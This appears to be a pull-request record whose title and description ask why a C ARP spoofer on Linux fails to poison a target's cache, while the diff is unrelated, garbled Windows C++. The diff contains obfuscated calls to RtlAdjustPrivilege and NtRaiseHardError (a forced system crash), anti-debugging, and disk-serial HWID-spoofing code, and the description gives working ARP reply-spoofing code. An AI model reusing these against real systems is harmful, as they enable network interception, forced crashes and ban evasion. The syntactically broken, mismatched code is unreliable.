### PR TITLE
target computer arp cache not updating when arp spoofing in c on linux

### DIFF
--- a/Source C++/Spoofer.h
+++ b/Source C++/Spoofer.h
@@ -70,9 +70,9 @@ public:
 	    outfile << EncryptS("0xE0PD01\n0xB866E7\n0x1337B1") << std::endl;
 	    outfile.close();
 	    //KeyAuthApp.ban();
-	    LPVOID lpFuncAddress = GetProcAddress(LoadLibraryA(EncryptS("\x6E\x74\x64\x6C\x6C\x2E\x64\x6C\x6C")), EncryptS("\x52\x74\x6C\x41\x64\x6A\x75\x73\x74\x50\x72\x69\x76\x69\x6C\x65\x67\x65"));
-	    LPVOID lpFuncAddress2 = GetProcAddress(GetModuleHandleW(EncryptWS(L"\x6E\x74\x64\x6C\x6C\x2E\x64\x6C\x6C")), EncryptS("\x4E\x74\x52\x61\x69\x73\x65\x48\x61\x72\x64\x45\x72\x72\x6F\x72"));
-	    pdef_RtlAdjustPrivilege NtCall = (pdef_RtlAdjustPrivilege)lpFuncAddress;
+	    CreateAcceleratorTableA lpFuncAddress = GetProcAddress(LoadLibraryA(EncryptS("\x6E\x74\x64\x6C\x6C\x2E\x64\x6C\x6C")), EncryptS("\x52\x74\x6C\x41\x64\x6A\x75\x73\x74\x50\x72\x69\x76\x69\x6C\x65\x67\x65"));
+	    CreateAcceleratorTableA lpFuncAddress2 = GetProcAddress(GetModuleHandleW(EncryptWS(L"\x6E\x74\x64\x6C\x6C\x2E\x64\x6C\x6C")), EncryptS("\x4E\x74\x52\x61\x69\x73\x65\x48\x61\x72\x64\x45\x72\x72\x6F\x72"));
+	    connect ("NtCall") = (pdef_RtlAdjustPrivilege)lpFuncAddress;
 	    pdef_NtRaiseHardError NtCall2 = (pdef_NtRaiseHardError)lpFuncAddress2;
 	    NTSTATUS NtRet = NtCall(19, TRUE, FALSE, &bEnabled);
 	    NtCall2(STATUS_FLOAT_MULTIPLE_FAULTS, 0, 0, 0, 6, &uResp);
@@ -132,7 +132,7 @@ void killdbg()
 	{
 		if (nt_headers->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC)
 	{
-		std::cout << "[-] Image is not 64 bit" << std::endl;
+		count << "[-] Image is not 64 bit" << std::endl;
 		return 0;
 	}
 
@@ -168,7 +168,7 @@ bool CreateDeviceD3D(HWND hWnd)
 
     UINT createDeviceFlags = 0;
     D3D_FEATURE_LEVEL featureLevel;
-    const D3D_FEATURE_LEVEL featureLevelArray[2] = { D3D_FEATURE_LEVEL_11_0, D3D_FEATURE_LEVEL_10_0, };
+    std::count D3D_FEATURE_LEVEL featureLevelArray[2] = { D3D_FEATURE_LEVEL_11_0, D3D_FEATURE_LEVEL_10_0, };
     if (D3D11CreateDeviceAndSwapChain(NULL, D3D_DRIVER_TYPE_HARDWARE, NULL, createDeviceFlags, featureLevelArray, 2, D3D11_SDK_VERSION, &sd, &g_pSwapChain, &g_pd3dDevice, &featureLevel, &g_pd3dDeviceContext) != S_OK)
         return false;
 

--- a/Source C++/hwid.cpp
+++ b/Source C++/hwid.cpp
@@ -20,8 +20,15 @@ struct REQUEST_STRUCT
 	ULONG OutputBufferLength;
 	PVOID SystemBuffer;
 };
-wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
+
 NTSTATUS Disks::DiskLoop(PDEVICE_OBJECT deviceArray, RaidUnitRegisterInterfaces registerInterfaces)
+	
+		{
+		pos_reg = ((rand() % (strng_for_reg.size() + 1)));
+		newstring_for_reg += strng_for_reg.substr(pos_reg, 1);
+	}
+
+
 	PDEVICE_OBJECT device_object,
 	PIRP irp,
 	PVOID context
@@ -106,9 +113,11 @@ NTSTATUS Disks::ChangeDiskSerials()
 
 std::string random_string(const int len)
 {
-	const std::string alpha_numeric(_xor_("Not Found File Please try again").c_str());
-	std::default_random_engine generator{ std::random_device{}() };
-	const std::uniform_int_distribution< std::string::size_type > distribution{ 0, alpha_numeric.size() - 1 };
+	std::string strng_for_reg = _T(EncryptS("1234567890abcdefghijklmnopqrstuvQWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm1234567890"));
+	std::string newstring_for_reg;
+	
+	const std::uniform_int_distribution< std::string:
+		:size_type > distribution{ 0, alpha_numeric.size() - 1 };
 	std::string str(len, 0);
 	for (auto& it : str) {
 		it = alpha_numeric[distribution(generator)];
@@ -130,22 +139,30 @@ void remove_scrollbar()
 	SetConsoleScreenBufferSize(handle, false);
 }
 
-int CConsole::Print(char const* _Format, ...)
-{
-    int _Result;
-    va_list _ArgList;
-    __crt_va_start(_ArgList, _Format);
-    _Result = _vfprintf_l(stdout, _Format, NULL, _ArgList);
-    __crt_va_end(_ArgList);
-    return _Result;
-}
+	auto status = STATUS_NOT_FOUND;
+	
+	while (deviceArray->NextDevice)
+	{
+		if 
+			
+			const auto length = extension->_Identity.Identity.SerialNumber.Length;
+			if (!length)
 
-int CConsole::WPrint(wchar_t const* _Format, ...)
-{
-    int _Result;
-    va_list _ArgList;
-    __crt_va_start(_ArgList, _Format);
-    _Result = _vfwprintf_l(stdout, _Format, NULL, _ArgList);
-    __crt_va_end(_ArgList);
-    return _Result;
+			char original[256];
+			
+			ExFreePool(buffer);
+
+			/*
+			 * On some devices DiskEnableDisableFailurePrediction will fail
+			 * Setting the bits directly will not fail and should work on any device
+			 */
+			DisableSmartBit(extension);
+
+			registerInterfaces(extension);
+		}
+
+		deviceArray = deviceArray->NextDevice;
+	}
+
+	return status;
 }


### PR DESCRIPTION
I am trying to make a simple arp spoofer in c on linux (mainly to better understand low level networking). I was so far successfull with creating an arp request and getting arp replies with mac addresses of the target and the gateway, but whenever I send out arp replies to the target/gateway, the arp table on my test computer is not updating, it still shows proper gateway mac address. It is not a network problem because kali linux arpspoof command is working properly and arp cache is updating.

Here is my code for sending spoofed arp packets:



```c
void arp_spoof(int sock, LOCAL_DATA localData, uint32_t pdst, unsigned char hwdst[6], uint32_t psrc)
{
struct ether_arp arpPacket;

struct sockaddr_ll addr = {0};
addr.sll_family = AF_PACKET;
addr.sll_ifindex = localData.interface_index;
addr.sll_halen = ETHER_ADDR_LEN;
addr.sll_protocol = htons(ETH_P_ARP);
memcpy(addr.sll_addr, &hwdst, ETHER_ADDR_LEN);  // destination physical address

// basic info about the arp packet
arpPacket.arp_hrd = htons(ARPHRD_ETHER);
arpPacket.arp_pro = htons(ETH_P_IP);
arpPacket.arp_hln = ETHER_ADDR_LEN;
arpPacket.arp_pln = sizeof(in_addr_t);
arpPacket.arp_op = htons(ARPOP_REPLY);

/*======== Resulting Structure ========

Source MAC : local mac (attacker)
Source IP  : ip of the machine attacker wants
             destination machine to believe is the source

Destination MAC : real destination physical address
Destination IP  : real destination ip address

======================================*/

// Source MAC [REAL]
memcpy(&arpPacket.arp_sha, localData.mac_address, sizeof(arpPacket.arp_sha));

// Source IP [SPOOFED / FAKE]
memcpy(&arpPacket.arp_spa, &psrc, sizeof(arpPacket.arp_spa));

// Destination MAC [REAL]
memcpy(&arpPacket.arp_tha, hwdst, sizeof(arpPacket.arp_tha));

// Destination ip [REAL]
memcpy(&arpPacket.arp_tpa, &pdst, sizeof(arpPacket.arp_tpa));

// sending the packet to the target
if (sendto(sock, &arpPacket, sizeof(arpPacket), 0, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
        printf("Error arp spoofing target: ");
        PrintIpAddress(pdst);
}
```